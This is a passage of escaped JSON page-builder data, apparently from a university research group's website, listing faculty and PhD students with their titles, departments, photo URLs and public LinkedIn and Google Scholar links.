Sciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/susie-ramisetty-mikler-7a0b3014\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/publichealth.gsu.edu\\/profile\\/susie-ramisetty-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=KzNVJwIAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354}]},\"parentId\":\"182-c22\",\"index\":1,\"id\":\"182-c27\",\"partialId\":182,\"styleRef\":983,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c28\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c28\",\"index\":0,\"id\":\"182-c29\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-zelikovsky.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":704,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c28\",\"index\":0,\"id\":\"182-c30\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Alex Zelikovsky\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c28\",\"index\":2,\"id\":\"182-c31\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Distinguished University Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c28\",\"index\":1,\"id\":\"182-c32\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/alex-zelikovsky-48a2795\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/alex-zelikovsky\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=UzCRNJwAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c28\",\"index\":1,\"id\":\"182-c33\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c34\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c34\",\"index\":0,\"id\":\"182-c35\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-bourgeois.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":696,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c34\",\"index\":0,\"id\":\"182-c36\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Anu Bourgeois\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c34\",\"index\":2,\"id\":\"182-c37\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c34\",\"index\":1,\"id\":\"182-c38\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anu-bourgeois-09b7b32b\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/anu-bourgeois\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=qsAUgQ8AAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c34\",\"index\":1,\"id\":\"182-c39\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c40\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c40\",\"index\":0,\"id\":\"182-c41\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/08\\/hu_new-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1348,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c40\",\"index\":0,\"id\":\"182-c42\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Xiaolin Hu\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c40\",\"index\":2,\"id\":\"182-c43\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c40\",\"index\":1,\"id\":\"182-c44\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/csds.gsu.edu\\/profile\\/xiaolin-hu\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=zeU19nAAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c40\",\"index\":1,\"id\":\"182-c45\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c46\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c46\",\"index\":0,\"id\":\"182-c47\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-patterson.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1391,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c46\",\"index\":0,\"id\":\"182-c48\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Murray Patterson\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c46\",\"index\":2,\"id\":\"182-c49\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Assistant Professor <\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c46\",\"index\":1,\"id\":\"182-c50\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/murray-patterson-449a947\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/murray-patterson\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=X4J8vAEAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c46\",\"index\":1,\"id\":\"182-c51\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c52\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c52\",\"index\":0,\"id\":\"182-c53\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Taylor-shelton_300x300.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":705,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c52\",\"index\":0,\"id\":\"182-c54\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Taylor Shelton\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c52\",\"index\":2,\"id\":\"182-c55\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\\\">Assistant Professor<\\/span><\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c52\",\"index\":1,\"id\":\"182-c56\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/taylor-shelton-28a4b3291\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/taylor-shelton\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=WFA1Ry8AAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c52\",\"index\":1,\"id\":\"182-c57\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c58\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c58\",\"index\":0,\"id\":\"182-c59\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/Hassan-Babaie-300x300-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1634,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c58\",\"index\":0,\"id\":\"182-c60\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Hassan Babaie\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c58\",\"index\":2,\"id\":\"182-c61\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Associate Professor<br><\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c58\",\"index\":1,\"id\":\"182-c62\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/geosciences.gsu.edu\\/profile\\/hassan-babaie\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.researchgate.net\\/profile\\/Hassan-Babaie\\/4\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c58\",\"index\":1,\"id\":\"182-c63\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c64\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c64\",\"index\":0,\"id\":\"182-c65\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-cropped-Faris-e1697216253732.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1814,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c64\",\"index\":0,\"id\":\"182-c66\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Faris Hawamdeh<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c64\",\"index\":2,\"id\":\"182-c67\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Academic Professional<br><\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c64\",\"index\":1,\"id\":\"182-c68\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/faris-hawamdeh\\/?trk=public_profile_publication_contributor-image\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/faris-hawamdeh\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.researchgate.net\\/profile\\/Faris-Hawamdeh\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c64\",\"index\":1,\"id\":\"182-c69\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"}],\"id\":\"182-c3\",\"parentId\":\"182-c2\",\"partialId\":182,\"styleRef\":971,\"type\":\"content\"}],\"id\":\"182-c2\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Faculty\"},\"id\":\"182-c72\",\"parentId\":\"182-c71\",\"partialId\":182,\"styleRef\":986,\"type\":\"content\"}],\"id\":\"182-c71\",\"parentId\":\"182-c70\",\"partialId\":182,\"styleRef\":985,\"type\":\"content\"}],\"id\":\"182-c70\",\"parentId\":\"182-c2\",\"partialId\":182,\"styleRef\":984,\"type\":\"content\"}]},\"styleRef\":970,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Grads\",\"attrs\":{\"id\":\"grads\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c75\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c75\",\"index\":0,\"id\":\"182-c76\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-cropped-cropped-282038166_2492815234187345_4129762528023780269_n-e1697205710763.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1742,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c75\",\"index\":0,\"id\":\"182-c77\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sundos Al Subhi<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c75\",\"index\":2,\"id\":\"182-c78\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c75\",\"index\":3,\"id\":\"182-c79\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sundos-al-subhi-88bb97150\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c75\",\"index\":1,\"id\":\"182-c80\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c81\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c81\",\"index\":0,\"id\":\"182-c82\",\"partialId\":182,\"styleRef\":849,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/06\\/cropped-cropped-cropped-IMG_1240-scaled-1-e1697205818731.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1744,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c81\",\"index\":0,\"id\":\"182-c83\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Aaja Christie<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c81\",\"index\":2,\"id\":\"182-c84\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c81\",\"index\":3,\"id\":\"182-c85\",\"partialId\":182,\"styleRef\":901,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/aaja-christie-17573657\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c81\",\"index\":1,\"id\":\"182-c86\",\"partialId\":182,\"styleRef\":853,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c87\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c87\",\"index\":0,\"id\":\"182-c88\",\"partialId\":182,\"styleRef\":856,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-cropped-Emma-e1697205932363.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1745,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c87\",\"index\":0,\"id\":\"182-c89\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Emma McDaniel<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c87\",\"index\":2,\"id\":\"182-c90\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"styleRef\":852,\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"parentId\":\"182-c87\",\"index\":1,\"id\":\"182-c91\",\"partialId\":182,\"type\":\"content\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/emmamcdaniel\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=Cwt8OwkAAAAJ&hl=en\"},\"name\":\"socicon\\/googlescholar\"}]},\"parentId\":\"182-c87\",\"index\":1,\"id\":\"182-c92\",\"partialId\":182,\"styleRef\":857,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c93\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c93\",\"index\":0,\"id\":\"182-c94\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-cropped-sara-edwards1-e1697206932891.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1754,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c93\",\"index\":0,\"id\":\"182-c95\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sara Edwards<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c93\",\"index\":2,\"id\":\"182-c96\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student, MS Graduate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c93\",\"index\":3,\"id\":\"182-c97\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sara-edwards-691b8331\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c93\",\"index\":1,\"id\":\"182-c98\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c99\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c99\",\"index\":0,\"id\":\"182-c100\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-cropped-cropped-cropped-Ryan-e1697207029774.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1756,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c99\",\"index\":0,\"id\":\"182-c101\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Ryan Garland<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c99\",\"index\":2,\"id\":\"182-c102\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student, MS Graduate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c99\",\"index\":3,\"id\":\"182-c103\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/ryan-g-aa71a0163\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c99\",\"index\":1,\"id\":\"182-c104\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c105\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c105\",\"index\":0,\"id\":\"182-c106\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-cropped-cropped-Jean-e1697206801281.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1750,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c105\",\"index\":0,\"id\":\"182-c107\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Jean Guo\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c105\",\"index\":2,\"id\":\"182-c108\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student<\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c105\",\"index\":3,\"id\":\"182-c109\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c110\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c110\",\"index\":0,\"id\":\"182-c111\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-cropped-anupam-e1697206626249.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1747,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c110\",\"index\":0,\"id\":\"182-c112\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Anupam Sarker<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c110\",\"index\":2,\"id\":\"182-c113\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c110\",\"index\":3,\"id\":\"182-c114\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anupam-sarker-b164b412a\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c110\",\"index\":1,\"id\":\"182-c115\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c116\",\"parentId\":\"182-c74\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c116\",\"index\":0,\"id\":\"182-c117\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-Ardavan-